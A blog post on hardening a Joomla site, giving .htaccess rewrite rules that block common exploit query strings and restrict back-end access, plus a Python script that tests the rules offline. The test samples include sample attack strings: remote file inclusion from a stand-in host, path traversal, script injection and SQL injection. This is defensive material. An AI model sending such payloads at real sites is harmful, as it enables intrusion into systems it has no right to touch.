Hardening Joomla with the .htaccess file

Some time ago, while still on the older Joomla 1.5, the site was compromised and many files were modified. After rebuilding the whole platform I wanted to strengthen both the protective measures and my habits, so this post collects the .htaccess settings, gathered from the web and from the official Joomla! documentation, that raise the security of a Joomla! site. I have included most of what the official documentation lists; a few entries were too thin or aimed at one particular extension, so I left those out.

  ######################################################
  ##
  ## The settings below are meant to prevent common attacks. They are taken from the
  ## Joomla! Documentation; place this file in the Joomla root directory.
  ##
  ######################################################

  ## mod_rewrite must be switched on, otherwise none of the rules below take effect
  RewriteEngine On

  ########## Begin - Rewrite rules to block out some common exploits
  ## If you experience problems on your site block out the operations listed below
  ## This attempts to block the most common type of exploit `attempts` to Joomla!
  #
  # If the request query string contains /proc/self/environ (by SigSiu.net)
  RewriteCond %{QUERY_STRING} proc/self/environ [OR]
  # Block out any script trying to set a mosConfig value through the URL
  # (these attacks wouldn't work w/out Joomla! 1.5's Legacy Mode plugin)
  RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
  # Block out any script trying to base64_encode or base64_decode data within the URL
  RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [OR]
  ## IMPORTANT: If the above line throws an HTTP 500 error, replace it with these 2 lines:
  # RewriteCond %{QUERY_STRING} base64_encode\(.*\) [OR]
  # RewriteCond %{QUERY_STRING} base64_decode\(.*\) [OR]
  # Block out any script that includes a <script> tag in URL
  RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
  # Block out any script trying to set a PHP GLOBALS variable via URL
  RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
  # Block out any script trying to modify a _REQUEST variable via URL
  RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
  # Return 403 Forbidden header and show the content of the root homepage
  RewriteRule .* index.php [F]
  #
  ########## End - Rewrite rules to block out some common exploits

  ########## Begin - File injection protection, by SigSiu.net
  RewriteCond %{REQUEST_METHOD} GET
  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
  RewriteRule .* - [F]
  ########## End - File injection protection

  ########## Begin - Advanced server protection - query strings, referrer and config
  # Advanced server protection, version 3.2 - May 2011
  # by Nicholas K. Dionysopoulos

  ## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine
  ## your PHP version). See http://www.0php.com/php_easter_egg.php and
  ## http://osvdb.org/12184 for more information
  RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]
  RewriteRule .* - [F]

  ## SQLi first line of defense, thanks to Radek Suski (SigSiu.net) @
  ## http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
  ## May cause problems on legitimate requests
  RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
  RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
  RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC]
  RewriteRule .* - [F]

  ## Referrer filtering for common media files. Replace with your own domain name.
  ## This blocks most common fingerprinting attacks ;)
  ## Note: Change www\.example\.com with your own domain name, substituting the
  ## dots with \.  i.e. use www\.example\.com for www.example.com
  ## Left disabled for now: it pins requests to one domain and would break local testing
  #RewriteRule ^images/stories/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|ico)$ - [L]
  #RewriteCond %{HTTP_REFERER} .
  #RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com [NC]
  #RewriteCond %{REQUEST_FILENAME} -f
  #RewriteRule \.(jp(e?g|2)?|png|gif|bmp|css|js|swf|ico)$ - [F]

  ## Disallow visual fingerprinting of Joomla! sites (module position dump)
  ## Initial idea by Brian Teeman and Ken Crowder, see:
  ## http://www.slideshare.net/brianteeman/hidden-joomla-secrets
  ## Improved by @nikosdion to work more efficiently and handle template
  ## and tmpl query parameters
  RewriteCond %{QUERY_STRING} (^|&)tmpl=(component|system) [NC]
  RewriteRule .* - [L]
  RewriteCond %{QUERY_STRING} (^|&)t(p|emplate|mpl)= [NC]
  RewriteRule .* - [F]

  ## Disallow access to htaccess.txt, configuration.php, configuration.php-dist and php.ini
  RewriteRule ^(htaccess\.txt|configuration\.php(-dist)?|php\.ini)$ - [F]

  ########## End - Advanced server protection - query strings, referrer and config

  ########## Begin - Advanced server protection - paths and files
  # Advanced server protection, version 3.2 - May 2011
  # by Nicholas K. Dionysopoulos

  ## Back-end protection
  ## This also blocks fingerprinting attacks browsing for XML and INI files
  RewriteRule ^administrator/?$ - [L]
  RewriteRule ^administrator/index\.(php|html?)$ - [L]
  RewriteRule ^administrator/index[23]\.php$ - [L]
  RewriteRule ^administrator/(components|modules|templates|images|plugins)/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|html?|mp(eg?|[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|zip|rar|pdf|xps|txt|7z|svg|od[tsp]|flv|mov)$ - [L]
  RewriteRule ^administrator/ - [F]

  ## Explicitly allow access only to XML-RPC's xmlrpc/index.php or plain xmlrpc/ directory
  RewriteRule ^xmlrpc/(index\.php)?$ - [L]
  RewriteRule ^xmlrpc/ - [F]

  ## Disallow front-end access for certain Joomla! system directories
  RewriteRule ^includes/js/ - [L]
  RewriteRule ^(cache|includes|language|libraries|logs|tmp)/ - [F]

  ## Allow limited access for certain Joomla! system directories with client-accessible content
  RewriteRule ^(components|modules|plugins|templates)/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|html?|mp(eg?|[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|zip|rar|pdf|xps|txt|7z|svg|od[tsp]|flv|mov)$ - [L]
  ## Uncomment this line if you have extensions which require direct access to their own
  ## custom index.php files. Note that this is UNSAFE and the developer should be ashamed
  ## for being so lame, lazy and security unconscious.
  # RewriteRule ^(components|modules|plugins|templates)/([^/]+/)*(index\.php)?$ - [L]
  ## Uncomment the following line if your template requires direct access to PHP files
  ## inside its directory, e.g. GZip compressed copies of its CSS files
  # RewriteRule ^templates/([^/]+/)*([^/.]+\.)+php$ - [L]
  RewriteRule ^(components|modules|plugins|templates)/ - [F]

  ## Disallow access to rogue PHP files throughout the site, unless they are explicitly allowed
  RewriteCond %{REQUEST_FILENAME} \.php$
  RewriteCond %{REQUEST_FILENAME} !/index[23]?\.php$
  ## The next line is to explicitly allow the forum post assistant (fpa-xx) script to run
  RewriteCond %{REQUEST_FILENAME} !/fpa-[a-z]{2}\.php
  RewriteCond %{REQUEST_FILENAME} -f
  RewriteRule ^([^/]+/)*([^/.]+\.)+php$ - [F]

  ########## End - Advanced server protection - paths and files

  ########## Begin - Block MySQL injection attempts (generic ruleset, not part of the Joomla! documentation)
  ## WARNING: far more aggressive than the rules above. "\.[a-z0-9]" rejects ANY query
  ## string containing a dot followed by a letter or digit (file names such as logo.png,
  ## IP addresses, version numbers), and the keyword list contains ordinary words such as
  ## set, cast and update. Exercise every front-end feature with this block enabled
  ## before using it in production.
  RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark) [NC,OR]
  RewriteCond %{QUERY_STRING} \.\./\.\. [OR]
  RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
  RewriteCond %{QUERY_STRING} \.[a-z0-9] [NC,OR]
  RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC]
  # Note: The final RewriteCond must NOT use the [OR] flag.
  ## A RewriteRule must follow, otherwise the conditions above are never evaluated.
  RewriteRule .* - [F]
  ########## End - Block MySQL injection attempts

In addition, a second .htaccess file can be placed in the administrator directory to restrict which IP addresses may log in to the back end.

  <IfModule mod_rewrite.c>
  RewriteEngine On
  ## Only the 172.20.8.0/24 range (replace with your own) may reach the back end;
  ## everyone else is redirected to /404.php, which must exist at the site root.
  ## The dots are escaped: an unescaped "." matches any character, so ^172.20.8.
  ## would also admit 172.20.80.x through 172.20.89.x.
  ## Behind a reverse proxy %{REMOTE_ADDR} is the proxy's address, not the client's.
  RewriteCond %{REMOTE_ADDR} !^172\.20\.8\.
  RewriteRule .* /404.php [R,L]
  </IfModule>
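
As an added check (this is not code from the original post or from Joomla!), the following Python script replays the main RewriteCond patterns from the two .htaccess files above against a handful of constructed query strings and client addresses. Apache evaluates %{QUERY_STRING} against the raw, still URL-encoded query string using PCRE, and Python's re module accepts these patterns unchanged, with [NC] becoming re.IGNORECASE. The script shows the exploit patterns firing on the attacks they were written for, the trailing "Block MySQL injection attempts" ruleset rejecting an ordinary image request because of \.[a-z0-9], and the unescaped dots in the administrator allow-list admitting addresses outside 172.20.8.0/24. The 172.20.8.x range, the evil.example host and every sample string are constructed for this test and are not captured traffic.

```python
"""Offline replay of the RewriteCond patterns from the .htaccess files above.

Added example, not from the original post or from Joomla!. Apache matches
%{QUERY_STRING} against the raw, still URL-encoded query string with PCRE;
Python's re handles these patterns identically, with [NC] -> re.IGNORECASE.
"""
import re

NC = re.IGNORECASE  # Apache [NC] flag

# One list per RewriteRule. The conditions are joined with [OR], so the
# first matching pattern is enough for the rule to answer 403 Forbidden.
COMMON_EXPLOITS = [
    (r"proc/self/environ", 0),
    (r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)", 0),
    (r"base64_(en|de)code[^(]*\([^)]*\)", 0),
    (r"(<|%3C)([^s]*s)+cript.*(>|%3E)", NC),
    (r"GLOBALS(=|\[|%[0-9A-Z]{0,2})", 0),
    (r"_REQUEST(=|\[|%[0-9A-Z]{0,2})", 0),
]
SQLI_FIRST_LINE = [
    (r"concat[^\(]*\(", NC),
    (r"union([^s]*s)+elect", NC),
    (r"union([^a]*a)+ll([^s]*s)+elect", NC),
]
BLOCK_MYSQL = [  # the aggressive generic ruleset appended at the end
    (r"(;|<|>|'|\"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*"
     r"(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark)", NC),
    (r"\.\./\.\.", 0),
    (r"(localhost|loopback|127\.0\.0\.1)", NC),
    (r"\.[a-z0-9]", NC),
    (r"(<|>|'|%0A|%0D|%27|%3C|%3E|%00)", NC),
]
RULESETS = {
    "common_exploits": COMMON_EXPLOITS,
    "sqli_first_line": SQLI_FIRST_LINE,
    "block_mysql": BLOCK_MYSQL,
}


def first_match(conds, query_string):
    """Return the pattern that fires for this raw query string, or None."""
    for pattern, flags in conds:
        if re.search(pattern, query_string, flags):
            return pattern
    return None


def verdict(query_string):
    """Pattern that fired per ruleset (None means that rule lets it through)."""
    return {name: first_match(conds, query_string) for name, conds in RULESETS.items()}


def is_blocked(query_string):
    """True if any of the three RewriteRules would answer 403."""
    return any(hit is not None for hit in verdict(query_string).values())


# administrator/.htaccess: RewriteCond %{REMOTE_ADDR} !^172.20.8.
# An unescaped dot matches any character, so the intended /24 quietly widens.
UNESCAPED = r"^172.20.8."
ESCAPED = r"^172\.20\.8\."


def admin_reachable(pattern, remote_addr):
    """True when the negated RewriteCond does not fire, i.e. remote_addr
    matches the allow pattern and the request is not sent to /404.php."""
    return re.match(pattern, remote_addr) is not None


# Constructed samples (not captured traffic), written exactly as a browser
# sends them (percent-encoded), because that is what Apache matches against.
ATTACKS = [
    "option=com_foo&file=../../../../proc/self/environ",
    "id=1&mosConfig_absolute_path=http://evil.example/shell.txt",
    "q=%3Cscript%3Ealert(1)%3C/script%3E",
    "id=1%20UNION%20SELECT%201,2,3",
    "id=1&x=concat(user(),0x3a,version())",
]
LEGITIMATE = [
    "option=com_content&view=article&id=12",
    "view=image&file=logo.png",                 # rejected only by block_mysql
    "option=com_search&searchword=news.update",  # likewise
]

if __name__ == "__main__":
    for qs in ATTACKS + LEGITIMATE:
        print("BLOCK" if is_blocked(qs) else "allow", qs)
        for name, hit in verdict(qs).items():
            if hit:
                print("    ", name, "->", hit)
    for ip in ("172.20.8.15", "172.20.80.5", "10.0.0.1"):
        print(ip, "unescaped:", admin_reachable(UNESCAPED, ip),
              "escaped:", admin_reachable(ESCAPED, ip))
```

Run it before and after editing the rules: a legitimate URL of your own site that prints BLOCK is a false positive you will hear about from users, and an attack that prints allow for every ruleset is a gap the .htaccess does not cover (the UNION SELECT sample, for instance, is stopped only by the SigSiu.net first line of defense, not by the generic MySQL block).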

Reference: [link]

